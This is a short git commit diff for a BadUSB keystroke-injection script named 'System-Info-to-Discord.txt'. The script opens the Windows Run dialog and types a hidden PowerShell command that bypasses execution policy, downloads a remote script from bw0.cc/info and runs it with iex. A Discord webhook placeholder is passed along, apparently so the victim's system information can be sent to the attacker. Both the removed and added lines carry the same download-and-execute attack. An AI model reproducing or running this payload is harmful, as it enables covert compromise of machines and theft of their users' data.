Update System-Info-to-Discord.txt

This commit is contained in:
egieb
2025-06-18 15:04:55 +00:00
committed by GitHub
parent 560bc40a83
commit 58a41d5b0c

View File

@@ -14,6 +14,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/info | iex
STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info)
ENTER